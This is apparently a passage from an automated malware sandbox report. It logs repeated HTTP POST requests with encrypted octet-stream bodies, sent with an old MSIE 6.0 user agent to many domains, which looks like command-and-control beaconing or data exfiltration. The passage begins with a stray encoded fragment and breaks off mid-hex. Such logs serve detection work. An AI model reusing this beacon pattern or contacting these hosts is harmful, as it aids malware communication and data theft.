hnNiP4MzHWdvKoEoisM7I6w8wuEpeCo3ZxHpX1GpfmLIwIclGU7tjsIqQArKjp8ZV96hNhCWhMyxnCi6kK1s/f57VVSh5K7g8Azbb6/x4Q1U4eZRuj5DRzHYlamIwnzC4ZyclvzIAwGAvVFqX5H6K3cM9KdKRVmcvPn0FpRiaH+cOZzMqHJVqzZzYhMv/+xF/duHehrU4RUXe/H9RA0pcB4c5zi/CXeF2q5rGFG5NGFrfofZA6gre6MGuDoQgGMTtclN1AR4vg3C8UEzXweJ1J9rfaLKMHb91hge2xHzVZe60COa1Q911yaG+sBr5PRIVcJ6QJM0nOK1AmZOJaHlfeq3I0CvYxZQzm7F8R9nT8TQMqnpWTgu9XpFWxFS78DwLlACccEgj3tj9MxnHmmNUHYJBhRSTJ9eyFrXmJZzl1ESfo/lCwyMnp23FGZS+aodk1gY8p9bp7CC8mjpNiaQsJK1VVtTaswpbkA2Ldzc6TRj1F8PozZnGV4dhxyZlfaVZNREoPi3dqKbzJXCuLw130t4MrTboE7E6zt+T9f+M3kBsXYE1+zceAfpo2NL2mJ2ol0=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 47 70 52 44 4d 38 48 4f 48 47 66 64 45 6a 41 4b 6f 46 6b 66 4a 4a 6f 41 32 6b 51 2f 76 36 33 5a 68 54 45 54 6b 78 50 6c 50 4a 73 71 45 49 4c 47 70 6c 52 34 54 4a 68 67 57 5a 48 51 38 7a 6c 46 4a 4f 38 65 48 50 46 46 6d 61 73 6b 4d 43 77 77 76 46 34 69 76 56 52 36 50 7a 63 56 55 39 58 34 6e 68 38 7a 4c 79 6c 70 42 73 67 53 54 6e 4a 75 30 36 76 75 4d 6b 6e 4b 6a 5a 31 79 78 4b 4e 56 56 44 56 5a 2f 57 72 35 48 69 77 6a 52 59 75 6a 48 76 78 46 78 6f 48 54 2f 64 2f 79 59 55 34 49 6f 7a 47 53 30 6a 67 31 72 72 4c 64 6e 39 52 70 50 32 49 38 48 61 62 4d 61 61 6d 67 6e 47 72 66 73 78 51 6f 36 52 6b 4e 78 6a 7a 43 56 50 66 65 47 57 70 4e 44 54 57 54 75 56 51 37 59 76 57 38 75 32 77 66 56 62 45 6b 65 79 74 4b 51 52 78 50 45 53 53 4b 69 4d 6f 79 63 46 70 52 65 71 4c 55 39 44 54 4d 6c 70 59 42 37 6a 54 74 31 32 69 4d 73 75 59 30 54 69 30 56 66 47 47 56 2f 55 4e 47 6b 49 45 34 37 7a 79 72 79 52 6d 54 54 31 53 5a 62 33 64 36 4b 78 2f 46 37 43 67 33 65 5a 4e 65 43 76 58 31 75 52 4a 44 50 6d 72 73 35 30 43 31 58 63 76 6d 37 52 35 2b 7a 46 5a 50 70 6c 32 55 79 62 57 43 39 44 71 31 43 44 56 48 62 51 39 32 6d 44 42 6e 71 65 4e 73 7a 67 4c 2b 52 69 6f 61 2b 34 72 5a 61 6b 75 76 70 74 5a 48 70 50 4e 31 4d 46 34 57 37 30 6d 78 57 34 76 53 4f 5a 2f 44 69 56 5a 52 73 62 31 73 6d 4e 58 47 42 6c 4c 65 70 4c 34 76 5a 30 42 70 69 4d 56 50 55 69 63 78 50 41 65 42 31 4c 79 46 43 6a 35 30 6b 57 42 75 65 36 2b 4e 77 45 4e 71 4f 32 59 59 66 34 6e 4b 58 6c 62 76 31 59 67 6a 61 6c 45 68 79 57 49 72 4d 30 4b 70 37 68 5a 75 70 76 65 44 76 52 4f 47 47 35 57 48 46 32 4a 6c 68 52 64 33 66 70 32 31 64 55 77 4c 66 39 53 32 6b 39 73 4a 57 38 4c 57 56 79 67 73 4b 65 79 6c Data Ascii: GpRDM8HOHGfdEjAKoFkfJJoA2kQ/v63ZhTETkxPlPJsqEILGplR4TJhgWZHQ8zlFJO8eHPFFmaskMCwwvF4ivVR6PzcVU9X4nh8zLylpBsgSTnJu06vuMknKjZ1yxKNVVDVZ/Wr5HiwjRYujHvxFxoHT/d/yYU4IozGS0jg1rrLdn9RpP2I8HabMaamgnGrfsxQo6RkNxjzCVPfeGWpNDTWTuVQ7YvW8u2wfVbEkeytKQRxPESSKiMoycFpReqLU9DTMlpYB7jTt12iMsuY0Ti0VfGGV/UNGkIE47zyryRmTT1SZb3d6Kx/F7Cg3eZNeCvX1uRJDPmrs50C1Xcvm7R5+zFZPpl2UybWC9Dq1CDVHbQ92mDBnqeNszgL+Rioa+4rZakuvptZHpPN1MF4W70mxW4vSOZ/DiVZRsb1smNXGBlLepL4vZ0BpiMVPUicxPAeB1LyFCj50kWBue6+NwENqO2YYf4nKXlbv1YgjalEhyWIrM0Kp7hZupveDvROGG5WHF2JlhRd3fp21dUwLf9S2k9sJW8LWVygsKeyl
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 69 79 50 42 6f 2f 5a 31 49 47 66 47 55 59 62 53 55 66 51 61 37 5a 6c 79 38 75 30 57 55 33 50 70 69 72 6b 54 78 69 49 42 46 52 56 44 42 44 57 54 68 77 59 56 57 52 67 47 52 4c 4a 49 62 43 2f 76 6f 37 43 52 38 42 4d 79 38 4a 4d 41 72 4c 4c 2b 71 78 4b 65 30 59 36 6f 36 79 42 39 49 42 77 4f 58 54 75 42 2b 73 70 45 39 44 4d 53 49 34 71 41 6a 47 52 61 53 6b 57 4b 58 31 51 35 4f 58 79 56 36 45 6a 42 31 79 69 74 33 78 54 45 59 47 37 69 6f 68 70 57 59 6f 70 37 48 6e 39 70 6c 30 52 39 4b 37 4f 36 62 38 45 79 33 72 42 6f 43 55 30 2f 31 78 63 66 2f 49 79 7a 6a 73 50 55 71 62 4b 6f 64 65 71 52 47 55 51 54 76 71 48 66 47 76 72 70 65 41 77 6d 61 4a 6a 76 34 6a 55 72 65 36 42 6d 42 30 58 66 6e 69 61 35 73 38 50 34 2f 6e 4d 35 45 50 49 43 78 53 4d 36 32 74 47 66 54 57 55 34 4a 68 61 44 53 4d 43 6f 77 47 59 64 58 45 39 61 70 64 50 6b 51 70 30 75 58 34 34 57 52 73 58 53 66 54 59 59 79 33 69 76 72 6f 78 63 79 37 34 6a 31 46 56 71 68 5a 44 69 4a 30 54 67 51 78 2f 65 73 36 5a 51 78 48 68 42 77 50 36 58 71 5a 2b 72 75 58 43 32 57 6c 2f 42 70 6c 49 7a 64 43 77 58 72 79 51 34 73 44 70 5a 51 52 77 70 65 66 4d 4c 56 4c 37 49 76 62 50 53 71 37 31 6d 74 39 7a 4b 58 37 71 58 74 47 35 73 55 76 4a 61 2b 61 58 47 43 42 50 45 41 48 38 61 6b 55 61 68 70 6c 4f 65 58 31 63 46 54 6b 72 77 6f 57 46 33 6a 50 37 35 52 58 69 51 71 33 6d 31 33 37 50 78 7a 4a 2b 7a 78 4f 4d 52 7a 31 77 7a 63 34 47 75 67 73 2f 48 70 6b 58 57 67 75 46 54 2b 48 6a 51 33 34 50 6c 6e 31 48 57 68 59 6c 64 72 30 35 63 55 59 78 31 54 70 57 6b 74 4b 42 6f 2f 48 74 35 53 34 46 39 61 51 44 42 62 47 66 69 68 4a 4a 55 38 4f 54 56 49 53 56 62 4c 49 62 33 4a 79 2b 6d 65 58 61 45 42 68 77 68 57 72 5a 47 53 66 33 58 58 63 4a 6d 4b 47 30 74 61 67 48 54 2b 4e 66 2b 43 36 36 6d 43 46 4c 74 47 51 46 53 75 77 35 4f Data Ascii: iyPBo/Z1IGfGUYbSUfQa7Zly8u0WU3PpirkTxiIBFRVDBDWThwYVWRgGRLJIbC/vo7CR8BMy8JMArLL+qxKe0Y6o6yB9IBwOXTuB+spE9DMSI4qAjGRaSkWKX1Q5OXyV6EjB1yit3xTEYG7iohpWYop7Hn9pl0R9K7O6b8Ey3rBoCU0/1xcf/IyzjsPUqbKodeqRGUQTvqHfGvrpeAwmaJjv4jUre6BmB0Xfnia5s8P4/nM5EPICxSM62tGfTWU4JhaDSMCowGYdXE9apdPkQp0uX44WRsXSfTYYy3ivroxcy74j1FVqhZDiJ0TgQx/es6ZQxHhBwP6XqZ+ruXC2Wl/BplIzdCwXryQ4sDpZQRwpefMLVL7IvbPSq71mt9zKX7qXtG5sUvJa+aXGCBPEAH8akUahplOeX1cFTkrwoWF3jP75RXiQq3m137PxzJ+zxOMRz1wzc4Gugs/HpkXWguFT+HjQ34Pln1HWhYldr05cUYx1TpWktKBo/Ht5S4F9aQDBbGfihJJU8OTVISVbLIb3Jy+meXaEBhwhWrZGSf3XXcJmKG0tagHT+Nf+C66mCFLtGQFSuw5O
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 68 6a 61 65 50 49 51 63 48 57 63 6e 71 35 50 70 6e 2f 34 70 32 31 64 75 70 2b 69 38 33 33 39 57 2b 44 47 56 64 59 57 35 6b 34 4b 42 59 47 48 62 36 5a 55 64 33 44 54 34 79 37 69 6a 44 2f 70 47 57 45 31 47 39 35 70 61 32 4c 38 35 30 38 46 51 61 6d 50 76 75 38 46 79 56 77 64 77 55 76 67 32 41 58 57 6a 6c 73 78 4a 55 68 52 59 5a 50 63 6a 31 4f 66 74 58 59 69 30 47 34 58 65 71 31 6a 70 46 57 62 72 68 47 46 79 4d 37 66 4f 75 6a 6c 50 71 5a 2b 37 36 36 7a 2b 4b 41 47 6b 6d 79 58 46 62 67 64 47 77 36 67 4f 6f 6f 58 53 76 42 68 35 34 4f 72 59 4f 72 4d 30 48 30 44 42 74 77 6a 37 44 4b 33 78 48 70 52 33 4b 38 63 4f 38 69 6e 49 43 63 5a 4d 50 37 57 2f 53 65 4c 52 37 44 4c 37 64 63 59 77 71 77 67 50 46 71 47 64 5a 68 78 63 67 50 6c 50 69 53 57 46 6f 2b 61 62 6d 2b 61 34 33 62 7a 74 4c 43 6d 71 55 66 48 33 33 2b 51 77 43 4d 78 56 69 55 43 50 33 56 4b 47 74 41 77 75 5a 65 6e 6e 68 4a 44 5a 39 56 38 6f 6b 62 68 50 37 46 73 75 66 74 58 55 68 35 2b 76 77 6d 44 7a 56 41 33 4d 66 6a 54 2f 73 6f 31 48 58 4d 48 74 77 62 62 79 51 72 57 54 77 4a 68 45 58 63 37 51 39 51 4d 6b 61 6f 47 6d 44 30 61 33 41 4f 43 36 54 6f 47 4c 41 31 64 79 68 2b 4a 48 4c 6f 63 61 59 34 63 45 56 47 6a 56 50 6b 59 78 50 49 52 45 50 54 57 67 38 44 52 6e 39 69 42 6b 52 42 5a 68 34 6d 63 6e 6d 5a 70 37 39 51 71 37 36 52 39 4a 56 47 7a 59 37 39 6f 44 4b 48 69 4e 36 78 44 47 49 4b 58 77 56 42 77 32 7a 67 4d 44 50 4c 36 63 77 48 59 67 63 73 76 64 41 30 67 6c 41 56 63 71 51 50 37 47 36 38 41 4c 65 54 49 32 32 41 61 55 45 31 68 56 76 34 34 44 4f 77 33 4c 39 54 62 2b 52 77 63 75 30 39 58 77 4f 7a 6b 33 64 38 7a 49 6f 37 48 53 39 6c 6f 3d Data Ascii: hjaePIQcHWcnq5Ppn/4p21dup+i8339W+DGVdYW5k4KBYGHb6ZUd3DT4y7ijD/pGWE1G95pa2L8508FQamPvu8FyVwdwUvg2AXWjlsxJUhRYZPcj1OftXYi0G4Xeq1jpFWbrhGFyM7fOujlPqZ+766z+KAGkmyXFbgdGw6gOooXSvBh54OrYOrM0H0DBtwj7DK3xHpR3K8cO8inICcZMP7W/SeLR7DL7dcYwqwgPFqGdZhxcgPlPiSWFo+abm+a43bztLCmqUfH33+QwCMxViUCP3VKGtAwuZennhJDZ9V8okbhP7FsuftXUh5+vwmDzVA3MfjT/so1HXMHtwbbyQrWTwJhEXc7Q9QMkaoGmD0a3AOC6ToGLA1dyh+JHLocaY4cEVGjVPkYxPIREPTWg8DRn9iBkRBZh4mcnmZp79Qq76R9JVGzY79oDKHiN6xDGIKXwVBw2zgMDPL6cwHYgcsvdA0glAVcqQP7G68ALeTI22AaUE1hVv44DOw3L9Tb+Rwcu09XwOzk3d8zIo7HS9lo=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.rs-ag.comCache-Control: no-cacheData Raw: 4a 33 57 79 6e 4d 44 62 4d 47 64 31 6a 52 36 5a 6b 35 77 34 5a 2f 4d 34 69 6b 65 6f 4e 5a 4b 7a 39 4b 36 77 30 56 52 38 6a 68 37 4b 79 5a 41 51 6f 4c 41 75 46 47 32 70 57 34 43 70 50 79 70 52 68 67 6b 6a 41 47 59 6f 37 48 71 7a 64 44 48 59 55 52 43 31 37 69 55 48 66 33 64 54 4a 44 51 76 34 4b 45 53 38 31 42 66 48 4a 68 36 61 54 50 6b 63 35 57 75 79 76 4c 69 51 66 48 44 71 4a 75 72 4f 7a 61 58 44 66 42 6e 76 6c 4e 32 68 67 78 68 70 6f 56 45 56 49 4d 57 54 6f 45 2b 42 76 37 77 33 2b 68 6c 6f 38 76 74 2b 49 33 66 75 78 58 75 69 6e 6f 35 30 61 79 35 52 30 50 56 7a 65 74 51 55 4f 71 5a 6d 64 65 79 46 2b 4c 5a 55 2f 39 65 69 6e 70 4a 34 34 67 74 34 31 73 6d 69 41 62 7a 4f 4b 6d 7a 36 79 46 65 51 30 4f 79 52 33 78 73 74 44 36 38 78 54 72 52 4c 4f 36 76 7a 71 67 49 33 46 59 49 37 68 6f 4c 57 2b 73 33 38 78 78 57 70 45 62 70 4a 6b 73 50 4d 4c 41 5a 2f 65 6a 61 53 66 50 78 61 7a 6a 2f 6c 77 4f 6d 78 4e 4a 45 52 79 78 44 6f 72 63 58 59 2f 59 55 61 6b 70 6d 68 64 57 54 64 53 31 74 55 4e 49 75 4d 4a 61 6b 32 78 4d 64 69 32 4b 4a 63 49 64 4a 57 4e 6d 6c 6d 4d 62 4f 6a 71 74 43 68 6d 62 45 6a 66 66 76 63 58 69 41 4b 71 74 56 4f 4f 46 65 36 54 69 55 35 33 50 67 75 61 2f 6a 2f 57 70 67 2f 32 78 32 35 33 4d 6c 46 50 47 6e 30 4e 7a 43 2f 45 63 56 65 44 69 64 75 50 56 38 41 63 52 61 61 53 51 4b 43 54 36 59 63 6a 68 61 70 71 74 47 44 6e 74 6f 4a 55 42 4b 62 53 65 70 47 7a 76 77 71 62 61 6c 51 69 63 4a 31 41 69 2b 75 6a 72 35 59 67 51 5a 4f 69 72 4d 43 44 71 66 4a 63 32 7a 79 34 65 41 48 36 32 41 41 77 36 59 74 4b 2b 31 44 56 7a 6e 48 67 38 6f 6d 77 2f 75 66 57 7a 70 6d 4e 45 4f 46 78 59 59 64 37 59 54 68 4e 7a 6b 76 44 74 75 41 48 54 63 4f 77 3d 3d Data Ascii: J3WynMDbMGd1jR6Zk5w4Z/M4ikeoNZKz9K6w0VR8jh7KyZAQoLAuFG2pW4CpPypRhgkjAGYo7HqzdDHYURC17iUHf3dTJDQv4KES81BfHJh6aTPkc5WuyvLiQfHDqJurOzaXDfBnvlN2hgxhpoVEVIMWToE+Bv7w3+hlo8vt+I3fuxXuino50ay5R0PVzetQUOqZmdeyF+LZU/9einpJ44gt41smiAbzOKmz6yFeQ0OyR3xstD68xTrRLO6vzqgI3FYI7hoLW+s38xxWpEbpJksPMLAZ/ejaSfPxazj/lwOmxNJERyxDorcXY/YUakpmhdWTdS1tUNIuMJak2xMdi2KJcIdJWNmlmMbOjqtChmbEjffvcXiAKqtVOOFe6TiU53Pgua/j/Wpg/2x253MlFPGn0NzC/EcVeDiduPV8AcRaaSQKCT6YcjhapqtGDntoJUBKbSepGzvwqbalQicJ1Ai+ujr5YgQZOirMCDqfJc2zy4eAH62AAw6YtK+1DVznHg8omw/ufWzpmNEOFxYYd7YThNzkvDtuAHTcOw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 68 6e 4e 69 50 34 4d 7a 48 57 64 76 4b 6f 45 6f 69 73 4d 37 49 36 77 38 77 75 45 70 65 43 6f 33 5a 78 48 70 58 31 47 70 66 6d 4c 49 77 49 63 6c 47 55 37 74 6a 73 49 71 51 41 72 4b 6a 70 38 5a 56 39 36 68 4e 68 43 57 68 4d 79 78 6e 43 69 36 6b 4b 31 73 2f 66 35 37 56 56 53 68 35 4b 37 67 38 41 7a 62 62 36 2f 78 34 51 31 55 34 65 5a 52 75 6a 35 44 52 7a 48 59 6c 61 6d 49 77 6e 7a 43 34 5a 79 63 6c 76 7a 49 41 77 47 41 76 56 46 71 58 35 48 36 4b 33 63 4d 39 4b 64 4b 52 56 6d 63 76 50 6e 30 46 70 52 69 61 48 2b 63 4f 5a 7a 4d 71 48 4a 56 71 7a 5a 7a 59 68 4d 76 2f 2b 78 46 2f 64 75 48 65 68 72 55 34 52 55 58 65 2f 48 39 52 41 30 70 63 42 34 63 35 7a 69 2f 43 58 65 46 32 71 35 72 47 46 47 35 4e 47 46 72 66 6f 66 5a 41 36 67 72 65 36 4d 47 75 44 6f 51 67 47 4d 54 74 63 6c 4e 31 41 52 34 76 67 33 43 38 55 45 7a 58 77 65 4a 31 4a 39 72 66 61 4c 4b 4d 48 62 39 31 68 67 65 32 78 48 7a 56 5a 65 36 30 43 4f 61 31 51 39 31 31 79 61 47 2b 73 42 72 35 50 52 49 56 63 4a 36 51 4a 4d 30 6e 4f 4b 31 41 6d 5a 4f 4a 61 48 6c 66 65 71 33 49 30 43 76 59 78 5a 51 7a 6d 37 46 38 52 39 6e 54 38 54 51 4d 71 6e 70 57 54 67 75 39 58 70 46 57 78 46 53 37 38 44 77 4c 6c 41 43 63 63 45 67 6a 33 74 6a 39 4d 78 6e 48 6d 6d 4e 55 48 59 4a 42 68 52 53 54 4a 39 65 79 46 72 58 6d 4a 5a 7a 6c 31 45 53 66 6f 2f 6c 43 77 79 4d 6e 70 32 33 46 47 5a 53 2b 61 6f 64 6b 31 67 59 38 70 39 62 70 37 43 43 38 6d 6a 70 4e 69 61 51 73 4a 4b 31 56 56 74 54 61 73 77 70 62 6b 41 32 4c 64 7a 63 36 54 52 6a 31 46 38 50 6f 7a 5a 6e 47 56 34 64 68 78 79 5a 6c 66 61 56 5a 4e 52 45 6f 50 69 33 64 71 4b 62 7a 4a 58 43 75 4c 77 31 33 30 74 34 4d 72 54 62 6f 45 37 45 36 7a 74 2b 54 39 66 2b 4d 33 6b 42 73 58 59 45 31 2b 7a 63 65 41 66 70 6f 32 4e 4c 32 6d 4a 32 6f 6c 30 3d Data Ascii: hnNiP4MzHWdvKoEoisM7I6w8wuEpeCo3ZxHpX1GpfmLIwIclGU7tjsIqQArKjp8ZV96hNhCWhMyxnCi6kK1s/f57VVSh5K7g8Azbb6/x4Q1U4eZRuj5DRzHYlamIwnzC4ZyclvzIAwGAvVFqX5H6K3cM9KdKRVmcvPn0FpRiaH+cOZzMqHJVqzZzYhMv/+xF/duHehrU4RUXe/H9RA0pcB4c5zi/CXeF2q5rGFG5NGFrfofZA6gre6MGuDoQgGMTtclN1AR4vg3C8UEzXweJ1J9rfaLKMHb91hge2xHzVZe60COa1Q911yaG+sBr5PRIVcJ6QJM0nOK1AmZOJaHlfeq3I0CvYxZQzm7F8R9nT8TQMqnpWTgu9XpFWxFS78DwLlACccEgj3tj9MxnHmmNUHYJBhRSTJ9eyFrXmJZzl1ESfo/lCwyMnp23FGZS+aodk1gY8p9bp7CC8mjpNiaQsJK1VVtTaswpbkA2Ldzc6TRj1F8PozZnGV4dhxyZlfaVZNREoPi3dqKbzJXCuLw130t4MrTboE7E6zt+T9f+M3kBsXYE1+zceAfpo2NL2mJ2ol0=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.baijaku.comCache-Control: no-cacheData Raw: 71 37 7a 64 4f 46 50 39 48 47 63 41 2b 5a 6f 6e 47 75 4c 78 77 76 77 36 70 61 4d 35 7a 6a 7a 78 4e 78 41 31 34 6d 36 6d 43 4f 2f 6c 45 63 31 38 39 48 36 75 4d 39 47 56 30 75 6e 56 32 68 48 36 7a 64 6b 43 77 6a 4c 4d 57 74 56 43 4b 50 52 5a 33 54 46 38 62 45 50 73 50 5a 66 56 46 2f 31 72 64 75 51 64 68 56 39 45 69 63 65 77 4d 43 54 66 38 59 70 6a 5a 38 7a 72 6e 42 68 52 64 51 49 2f 74 76 41 72 6f 79 78 78 2b 59 76 6f 72 38 35 61 4e 33 6b 45 43 38 6c 75 78 54 35 58 35 4d 73 77 69 79 59 2f 5a 39 76 72 50 57 63 56 4d 2b 50 50 71 69 36 71 41 74 78 34 6e 45 43 78 35 74 71 6c 5a 33 43 6e 54 45 34 41 65 64 58 6a 49 69 62 73 34 4b 78 66 44 58 79 42 34 33 68 33 34 7a 65 50 39 32 66 49 62 59 41 75 59 6f 62 50 37 44 6e 68 45 57 4b 69 74 50 38 63 61 5a 57 72 30 6b 7a 38 4a 46 78 6f 58 65 6f 54 59 30 65 2b 56 30 54 4b 47 72 77 48 4c 6f 52 77 6e 77 36 76 77 37 6e 53 59 37 4a 70 47 6c 39 71 6c 6d 7a 2b 4f 7a 34 31 72 6d 2b 4e 67 4d 6c 59 31 46 66 4e 37 70 53 7a 39 67 31 35 30 53 62 4a 41 36 64 43 65 56 48 48 57 59 43 7a 31 78 4b 6f 50 64 47 68 4b 66 35 74 39 78 78 66 32 45 2f 78 42 2f 58 39 46 52 41 6a 62 55 52 34 77 4e 65 50 44 55 33 2b 55 77 73 37 4a 58 37 69 74 44 42 35 56 75 54 4e 4e 55 39 6d 51 33 53 46 43 71 66 53 54 47 4b 78 4c 53 64 4e 55 4b 39 7a 55 55 34 49 72 67 4e 78 49 44 6e 70 78 76 78 41 6f 69 52 75 53 59 6a 4d 4c 55 43 6e 41 4d 67 6a 33 61 62 76 68 34 4f 73 39 55 74 2f 48 59 57 50 34 2f 74 52 35 47 41 34 76 46 53 4e 6a 4f 2f 52 74 74 62 47 42 62 4d 53 6e 55 61 62 63 7a 79 46 76 76 4c 56 4d 54 50 55 57 2f 78 4d 72 53 43 4e 4e 6b 57 74 6c 4f 39 31 53 75 32 4d 42 6a 6d 76 66 39 72 55 4c 55 45 49 5a 43 75 39 4d 79 63 72 54 38 65 49 55 50 32 68 69 4d 46 5a 56 44 59 76 4a 51 66 44 78 65 76 32 2b 56 6f 70 6c 4b 33 4c 57 75 4b 36 Data Ascii: q7zdOFP9HGcA+ZonGuLxwvw6paM5zjzxNxA14m6mCO/lEc189H6uM9GV0unV2hH6zdkCwjLMWtVCKPRZ3TF8bEPsPZfVF/1rduQdhV9EicewMCTf8YpjZ8zrnBhRdQI/tvAroyxx+Yvor85aN3kEC8luxT5X5MswiyY/Z9vrPWcVM+PPqi6qAtx4nECx5tqlZ3CnTE4AedXjIibs4KxfDXyB43h34zeP92fIbYAuYobP7DnhEWKitP8caZWr0kz8JFxoXeoTY0e+V0TKGrwHLoRwnw6vw7nSY7JpGl9qlmz+Oz41rm+NgMlY1FfN7pSz9g150SbJA6dCeVHHWYCz1xKoPdGhKf5t9xxf2E/xB/X9FRAjbUR4wNePDU3+Uws7JX7itDB5VuTNNU9mQ3SFCqfSTGKxLSdNUK9zUU4IrgNxIDnpxvxAoiRuSYjMLUCnAMgj3abvh4Os9Ut/HYWP4/tR5GA4vFSNjO/RttbGBbMSnUabczyFvvLVMTPUW/xMrSCNNkWtlO91Su2MBjmvf9rULUEIZCu9MycrT8eIUP2hiMFZVDYvJQfDxev2+VoplK3LWuK6
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pr-park.comCache-Control: no-cacheData Raw: 62 36 64 2b 74 43 41 42 49 57 63 4a 53 51 7a 55 63 38 47 75 75 31 4e 6c 67 56 65 49 74 69 31 55 56 48 4c 4f 68 49 58 56 43 47 6d 33 5a 32 76 37 45 5a 68 75 74 73 73 36 5a 72 79 6c 7a 34 68 42 38 32 77 37 74 53 72 78 6b 44 4c 65 54 67 45 39 34 66 72 43 64 4c 47 65 56 74 46 34 35 32 56 63 47 71 63 39 71 6d 66 39 76 7a 42 53 37 6a 4f 71 4e 68 54 5a 6a 56 57 42 32 31 39 32 39 49 5a 39 70 7a 62 76 7a 4d 53 76 71 55 56 49 68 42 4b 4b 72 73 32 65 6d 68 4b 42 43 62 77 54 59 61 45 31 5a 4a 6e 71 45 6d 47 38 30 6a 33 31 78 30 58 72 43 6e 69 33 73 76 6e 30 7a 61 71 65 34 2b 67 66 4e 51 65 6e 49 6f 34 46 2b 52 74 39 42 45 4b 6b 44 5a 56 45 2f 69 6b 62 66 75 59 48 48 34 67 37 72 31 51 36 44 42 77 71 42 43 32 68 77 57 63 61 6d 75 7a 6f 65 6a 6c 43 44 41 57 73 6a 55 6a 43 37 64 77 33 76 59 64 42 74 78 68 57 5a 73 54 36 52 44 30 51 7a 2b 62 47 58 47 4d 58 57 66 36 7a 70 5a 75 5a 7a 69 73 33 6e 63 2f 4a 39 43 78 62 7a 4c 42 7a 64 6a 50 58 4d 75 62 42 79 4e 4a 4c 4a 73 58 47 79 42 55 68 67 70 6f 6d 58 74 48 4a 69 4d 56 4c 4f 75 32 6d 76 59 52 66 52 6f 4c 56 6c 31 69 43 6b 72 66 72 7a 59 55 6d 55 76 78 55 4a 30 6c 75 54 78 78 74 38 65 41 46 32 4b 31 39 71 57 58 58 6b 4c 36 71 55 58 79 70 56 49 6e 53 35 6e 68 43 37 6c 56 69 2f 53 70 56 53 77 4a 56 37 68 72 52 30 70 4f 34 65 61 63 49 49 6b 2f 32 47 42 32 34 45 4c 32 6a 54 57 33 43 67 5a 32 76 2b 4e 47 38 42 7a 47 70 46 31 41 49 30 62 72 4f 36 73 6c 71 75 64 66 63 59 75 54 4f 30 37 77 56 46 41 75 39 57 45 4f 31 50 4b 6f 6e 4d 63 43 4a 4e 39 72 6c 4e 51 32 4d 57 51 2b 65 6e 77 65 42 4c 6b 77 32 57 7a 67 57 45 67 70 44 77 36 31 78 2b 39 65 69 48 4a 50 6d 6c 59 75 53 4e 63 65 50 66 68 46 72 59 31 58 59 73 75 31 49 6a 62 4b 59 31 78 63 2b 79 77 41 3d Data Ascii: b6d+tCABIWcJSQzUc8Guu1NlgVeIti1UVHLOhIXVCGm3Z2v7EZhutss6Zrylz4hB82w7tSrxkDLeTgE94frCdLGeVtF452VcGqc9qmf9vzBS7jOqNhTZjVWB21929IZ9pzbvzMSvqUVIhBKKrs2emhKBCbwTYaE1ZJnqEmG80j31x0XrCni3svn0zaqe4+gfNQenIo4F+Rt9BEKkDZVE/ikbfuYHH4g7r1Q6DBwqBC2hwWcamuzoejlCDAWsjUjC7dw3vYdBtxhWZsT6RD0Qz+bGXGMXWf6zpZuZzis3nc/J9CxbzLBzdjPXMubByNJLJsXGyBUhgpomXtHJiMVLOu2mvYRfRoLVl1iCkrfrzYUmUvxUJ0luTxxt8eAF2K19qWXXkL6qUXypVInS5nhC7lVi/SpVSwJV7hrR0pO4eacIIk/2GB24EL2jTW3CgZ2v+NG8BzGpF1AI0brO6slqudfcYuTO07wVFAu9WEO1PKonMcCJN9rlNQ2MWQ+enweBLkw2WzgWEgpDw61x+9eiHJPmlYuSNcePfhFrY1XYsu1IjbKY1xc+ywA=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheData Raw: 37 79 58 76 6d 68 72 4e 4d 47 65 31 4b 64 64 31 50 62 6b 72 38 31 33 6c 37 43 4d 4b 4d 36 45 4c 37 6c 44 35 41 61 68 67 72 4f 56 47 6a 4d 66 62 69 33 75 4f 63 4e 2f 6e 39 54 63 48 65 54 63 72 4f 78 31 58 72 65 6f 33 7a 5a 4c 5a 58 56 66 34 55 53 65 6d 71 51 6f 64 73 6b 71 32 76 41 43 32 32 72 44 72 77 46 7a 63 68 4c 48 46 4b 4a 2b 76 78 53 41 61 72 62 70 51 49 34 74 79 54 6c 41 65 30 56 71 43 6a 4b 45 4f 54 70 5a 64 4b 6e 55 44 74 2b 4a 7a 37 6f 32 6b 6e 6b 69 4c 6a 58 7a 70 67 59 62 6f 79 4b 64 67 44 4b 69 6a 37 6b 47 47 73 31 56 69 33 53 65 6a 59 67 4a 72 4c 71 4b 74 66 37 76 65 63 2b 66 6d 48 51 31 68 34 36 4c 45 56 76 72 65 73 67 51 33 74 50 65 62 77 46 78 4f 46 78 6c 59 2b 30 34 65 75 6d 51 6f 53 37 4c 4f 2f 6e 55 72 4c 35 36 74 6c 72 78 52 4d 32 74 64 67 61 4a 57 47 48 48 73 66 76 47 4e 42 55 34 7a 